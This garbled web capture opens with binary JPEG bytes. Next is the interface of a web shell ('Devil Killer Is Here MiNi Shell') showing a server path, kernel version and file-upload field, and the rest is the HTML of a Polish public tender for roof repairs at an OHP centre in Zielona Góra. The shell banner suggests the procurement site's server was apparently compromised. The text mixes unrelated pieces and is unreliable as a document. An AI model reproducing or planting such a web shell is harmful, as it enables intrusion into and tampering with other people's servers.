JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220727/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220727/0027940001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie remontu generalnego dachów w Ośrodku Szkolenia i Wychowania OHP w Zielonej Górze </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Lubuska Wojewódzka Komenda Ochotniczych Hufców Pracy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001036632</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zamenhofa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-186</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lwk.zgora@ohp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.lubuska-bip.ohp.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna nadzorowana przez Ministra Rodziny i Polityki Społecznej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie remontu generalnego dachów w Ośrodku Szkolenia i Wychowania OHP w Zielonej Górze </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd6ab928-0cbf-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00279400</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019611/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Wykonanie remontu generalnego dachów w Ośrodku Szkolenia i Wychowania OHP w Zielonej Górze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/<br/>https://epuap.gov.pl<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków (innych niż dokumenty składane wraz z ofertą), pism i zawiadomień (w tym przesyłanie pism w sprawie<br/>przesłania wyjaśnień treści SWZ) odbywa się wyłącznie za pomocą poczty elektronicznej.<br/>Zamawiający będzie komunikować się z Wykonawcami za pomocą poczty elektronicznej, kierując wszelką korespondencję na email<br/>podany przez Wykonawcę w formularzu ofertowym. Natomiast Wykonawca przesyła korespondencję (w tym wniosek o wyjaśnienie<br/>treści SWZ) do Zamawiającego na adres poczty elektronicznej: k.cyran@ohp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcy winni we wszelkich<br/>kontaktach z Zamawiającym powoływać się na znak postępowania: LWK.ZZP.271.20.2022.<br/>Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dn.<br/>30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Składanie oświadczeń, wniosków (innych niż dokumenty składane wraz z ofertą), pism i zawiadomień (w tym przesyłanie pism w<br/>sprawie przesłania wyjaśnień treści SWZ) odbywa się wyłącznie za pomocą poczty elektronicznej.<br/>Zamawiający będzie komunikować się z Wykonawcami za pomocą poczty elektronicznej, kierując wszelką korespondencję na email<br/>podany przez Wykonawcę w formularzu ofertowym. Natomiast Wykonawca przesyła korespondencję (w tym wniosek o wyjaśnienie<br/>treści SWZ) do Zamawiającego na adres poczty elektronicznej: k.cyran@ohp.pl<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem wyżej wymienionej poczty elektronicznej jako załączniki.<br/>Wszystkie dokumenty elektroniczne, w tym elektroniczne kopie dokumentów – dotyczące spełniania warunków udziału w<br/>postępowaniu, lub pełnomocnictwa, muszą być opatrzone elektronicznym podpisem kwalifikowanym, podpisem zaufanym lub<br/>podpisem osobistym, pod rygorem ich nieważności.<br/>Pozostała korespondencja (inna niż w zakresie dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub<br/>dokumentów potwierdzających brak podstaw wykluczenia), nie wymaga opatrzenia podpisem kwalifikowanym, podpisem zaufanym lub<br/>podpisem osobistym.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i<br/>na miniPortalu. Cały proces szyfrowania oferty ma miejsce na stronie miniPortalu.<br/>Oferta wraz załącznikami powinna być sporządzona w języku polskim, w formie elektronicznej (czyli podpisana kwalifikowalnym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Ofertę należy<br/>złożyć w oryginale. Zamawiający sugeruje złożenie oferty w formacie .pdf. Zamawiający uzna za dokument elektroniczny ofertę<br/>pierwotnie sporządzoną w postaci papierowej, a następnie przekształconą do postaci elektronicznej np. poprzez jej zeskanowanie.<br/>Informacje stanowiące tajemnicę przedsiębiorstwa powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem<br/>polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną część skompresowane<br/>do jednego pliku archiwum (ZIP).<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu określa Regulamin korzystania z miniPortalu oraz Regulamin ePUAP.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB.<br/>Za datę przekazania wszystkich dokumentów składających się na ofertę przyjmuje się datę ich przekazania na ePUAP i na<br/>miniPortalu. Data ta widoczna będzie na potwierdzeniu UPP. Zamawiający sugeruje zachowanie potwierdzenia UPP w celu ew.<br/>weryfikacji złożenia oferty w terminie.<br/>Zamawiający nie uzna jako oferty pliku, który nie da się otworzyć. Ofertę należy przygotować i składać w sposób określony w<br/>niniejszej SWZ oraz w wymaganiach miniPortalu i e-PUAP. Oferta musi dać się otworzyć w sposób prosty, za pośrednictwem<br/>powszechnie dostępnych na rynku programów.<br/>Więcej informacji w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osób występujących w dokumentacji Wykonawców ubiegających się o udzielenie zamówienia publicznego przez Lubuską Wojewódzką Komendę Ochotniczych Hufców Pracy z<br/>siedzibą przy ul. Zamenhofa 1, 65-186 Zielona Góra, jest Wojewódzki Komendant OHP, e-mail lwk.zgora@ohp.pl.<br/>2. W imieniu Administratora danych sferę przetwarzania danych osobowych nadzoruje Inspektor ochrony danych, z którym można<br/>kontaktować się pod adresem email: iodo.lubuska@ohp.pl.<br/>3. Pana/i dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego nr LWK.ZZP.271.20.2022 prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji.<br/>4. Dane przetwarzane będą w celu:<br/>a) koordynacji, rozstrzygnięcia i udokumentowania wyboru najkorzystniejszej oferty, zgodnie z ustawą z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych, w związku z art. 6 ust. 1 lit. c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27<br/>kwietnia 2016 r. (dalej RODO);<br/>b) prowadzenia korespondencji w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego art. 6 ust. 1 lit. c<br/>RODO;<br/>c) w celu ewentualnego ustalenia, dochodzenia lub obrony przed roszczeniami będącego realizacją prawnie uzasadnionego interesu<br/>art. 6 ust. 1 lit. f RODO.<br/>5. Dane osobowe mogą być udostępniane następującym odbiorcom bądź kategoriom odbiorców:<br/>a) podmiotom uprawnionym do uzyskania danych osobowych na podstawie przepisów prawa (np. NIK, Urząd Zamówień<br/>Publicznych);<br/>b) brokerowi PEF (Platformy Elektronicznego Fakturowania);<br/>c) obsłudze prawnej;<br/>d) operatorom pocztowym;<br/>e) innym oferentom;<br/>f) osobom występującym o udzielenie informacji publicznej.<br/>6. Dane osobowe przechowywane będą zgodnie z obowiązującymi przepisami prawa oraz zgodnie z uzasadnionym interesem<br/>administratora np. przez okres, w którym mogą ujawnić się roszczenia związane z rozstrzygnięciem zamówienia. Dokumentacja dot.<br/>zamówień publicznych jest przechowywana przez 5 lat, z wyjątkiem dokumentacji zamówień publicznych realizowanych w ramach<br/>projektów unijnych, którą administrator przechowuje przez 10 lat. W przypadku wyrażenia zgody na przetwarzanie, dane będą<br/>przetwarzane do czasu wycofania zgody.<br/>7. Posiada Pan/i prawo, z wyjątkami zastrzeżonymi przepisami prawa:<br/>a) żądania od Administratora dostępu do danych osobowych (art. 15 RODO );<br/>b) sprostowania danych (poprawiania) w przypadku gdy dane są nieprawidłowe lub niekompletne (art. 16 RODO);<br/>c) do żądania usunięcia danych osobowych tzw. „prawo do bycia zapominanym” (art. 17 RODO);<br/>d) żądania ograniczenia przetwarzania danych osobowych (art. 18 RODO).<br/>8. Nie przysługuje Panu/i:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Dodatkowe informacje dotyczące RODO znajdują się w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">LWK.ZZP.271.20.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie remontu generalnego dachów w Ośrodku Szkolenia i Wychowania OHP w Zielonej Górze. <br/>Zakres robót: <br/><br/>DACH WYSOKI „A”<br/>1. Doszczelnienie połączeń na wszystkich stykach (poziomymi i pionowymi) pomiędzy arkuszami blach – klej poliuretanowy.<br/>2. Wymiana wszystkich wkrętów „Farmer” (większa średnica trzpienia)<br/>3. Wymiana rynny i pasa nadrynnowego od strony południowej budynku.<br/><br/>DACH NISKI „B”<br/>1. Przebudowa istniejącej instalacji wentylacji mechanicznej- przeniesienie kominów wentylacyjnych poza obręb dachu + próba skuteczności wentylacji<br/>2. Przełożenie instalacji odgromowej + pomiar skuteczności instalacji<br/>3. Ułożenie klinów z wełny mineralnej 50 x 50 mm.<br/>4. Wykonanie warstwy nawierzchniowej dachów niskich poprzez jednokrotne pokrycie papą termozgrzewalną - szybki profil SBS o gramaturze 250 g/m2, wraz z wywinięciem h = 15 cm.<br/>5. Montaż listwy dociskowej aluminiowej na warstwie uszczelniającej silikonu (z wyciśnięciem nadmiaru uszczelniacza) – wykończenie papy.<br/>6. Wymiana wkrętów „Farmer” na pokryciu z blachy<br/><br/>DACH NISKI POKRYTY BLACHĄ „G”<br/>1. Zszycie styków pokrycia blachowkrętami<br/>2. Wymiana wszystkich wkrętów „Farmer” (większa średnica trzpienia)<br/><br/>DACHY „C”, „D”, „E”, „F”<br/>Pokrycie dachów papą nawierzchniową<br/><br/>Całość prac należy wykonać zgodnie z warunkami technicznymi wykonania <br/>i odbioru robót budowlano – montażowych w zakresie odnoszącym się do poszczególnych kategorii robót.<br/><br/>Szczegółowe warunki płatności, warunki zmiany umowy określone są w Tomie II (w załączniku nr II.3. - projekt umowy).<br/><br/>Sposób płatności za wykonanie przedmiotu zamówienia: <br/>1) Zapłata nastąpi po zakończeniu robót budowlanych, potwierdzonych protokołem odbioru końcowego.<br/>2) Dopuszcza się również możliwość częściowego wystawienia przez Wykonawcę faktury/rachunku na zakup urządzeń/materiałów niezbędnych do wykonania prac remontowych; wartość faktury/ rachunku odpowiednio pomniejsza wysokość należnego wynagrodzenia. <br/>3) Warunkiem otrzymania wynagrodzenia jest odbiór przedmiotu umowy potwierdzony stosownym protokołem odbioru końcowego robót, podpisanym przez osoby upoważnione przez strony umowy.<br/>4) Płatność wynagrodzenia nastąpi przelewem na wskazane konto bankowe Wykonawcy w terminie do 14 dni od daty doręczenia Zamawiającemu prawidłowo wystawionej faktury/rachunku, na podstawie protokołu końcowego odbioru robót.<br/><br/>Nie dokonano podziału zamówienia na części ponieważ, podział zadania na realizowane przez różnych wykonawców może spowodować wykonanie różnych zakresów prac w różnym czasie, a co za tym idzie może spowodować trudności w prawidłowym wykonaniu całego zadania. Potrzeba skoordynowania działań różnych wykonawców realizujących poszczególne zakresy robót mogłaby poważnie zagrozić właściwemu wykonaniu zamówienia, w tym spowodowałaby nadmierne trudności i koszty oraz brak koordynacji, skutkujący poważną groźbą nieprawidłowej realizacji zamówienia. Zakres przedmiotu zamówienia nie ogranicza ubiegania się o zamówienie mniejszym podmiotom z sektora małych i średnich przedsiębiorstw (MŚP). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45261900-3 - Naprawa i konserwacja dachów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">91 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria<br/>oceny ofert:<br/>Cena brutto zadania (C) –60%<br/>Okres gwarancji na zrealizowane zadanie (G) – 40%<br/>Ocena kryterium „C” zostanie dokonana na podstawie informacji zamieszczonej w Formularzu „Oferta” przy zastosowaniu wzoru:<br/>C = Cmin / Cof x 60<br/>gdzie:<br/>Cmin – najniższa cena brutto spośród ocenianych ofert,<br/>Cof – cena brutto badanej ofercie<br/>Ocena kryterium Okres gwarancji na zrealizowane zadanie „G” zostanie dokonana na podstawie zadeklarowanego przez<br/>Wykonawcę okresu gwarancji w Formularzu „Oferta”:<br/>36 miesięcy – 0,00 pkt.<br/>60 miesięcy – 40,00 pkt.<br/>W przypadku, gdy Wykonawca nie poda powyższych informacji w Formularzu „Oferta”, nie będą one podlegały uzupełnieniu, a<br/>Zamawiający uzna, iż Wykonawca ofertuje wymagany okres – 36 miesięcy i przyzna w tym kryterium oceny ofert 0,00 pkt.<br/>Długość okresu gwarancji jakości podlegająca ocenie w ramach kryterium Gwarancja na zrealizowanie zadania dotyczy wszystkich<br/>asortymentów robót.<br/>Bez względu na powyższe, jeżeli warunki gwarancji udzielonej przez producenta urządzeń przewidują dłuższy okres gwarancji niż<br/>gwarancja udzielona przez wykonawcę, obowiązuje okres gwarancji w wymiarze równym okresowi gwarancji producenta.<br/>Ostateczna ocena każdej oferty zostanie dokonana z dokładnością do dwóch miejsc po przecinku z zachowaniem zasady<br/>zaokrągleń matematycznych, na podstawie wzoru:<br/>OC = C + G<br/>Ocenie będą podlegały wyłącznie oferty niepodlegające odrzuceniu.<br/>Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w SWZ warunki oraz uzyska największą<br/>liczbę punktów w oparciu o podane kryteria.<br/>Zamawiający nie przewiduje aukcji elektronicznej.<br/>Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający poinformuje równocześnie wszystkich Wykonawców, którzy złożyli<br/>oferty o:<br/>1) wyborze najkorzystniejszej oferty, podając nazwę albo imię i nazwisko, siedzibę albo miejsce zamieszkania, jeżeli jest miejscem<br/>wykonywania działalności Wykonawcy, którego ofertę wybrano, oraz nazwy albo imiona i nazwiska, siedziby albo miejsca<br/>zamieszkania, jeżeli są miejscami wykonywania działalności Wykonawców, którzy złożyli oferty, a także punktację przyznaną<br/>ofertom w każdym kryterium oceny ofert i łączną punktację,<br/>2) Wykonawcach, których oferty zostały odrzucone,<br/>– podając uzasadnienie faktyczne i prawne.<br/>Zamawiający udostępni informacje, o których mowa w pkt 21.4. ppkt. 1) IDW, na stronie prowadzonego postępowania.<br/>Dodatkowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na zrealizowane zadanie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez<br/>zamawiającego warunki udziału w postępowaniu.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Nie dotyczy<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Nie dotyczy<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Nie dotyczy<br/>4) zdolności technicznej lub zawodowej – dysponowanie osobami:<br/>Wykonawca musi dysponować kierownikiem budowy, posiadającym uprawnienia budowlane bez ograniczeń.<br/>Spełnianie warunku udziału w postępowaniu może wykazać dowolny z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca<br/>nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności<br/>zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może<br/>mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) 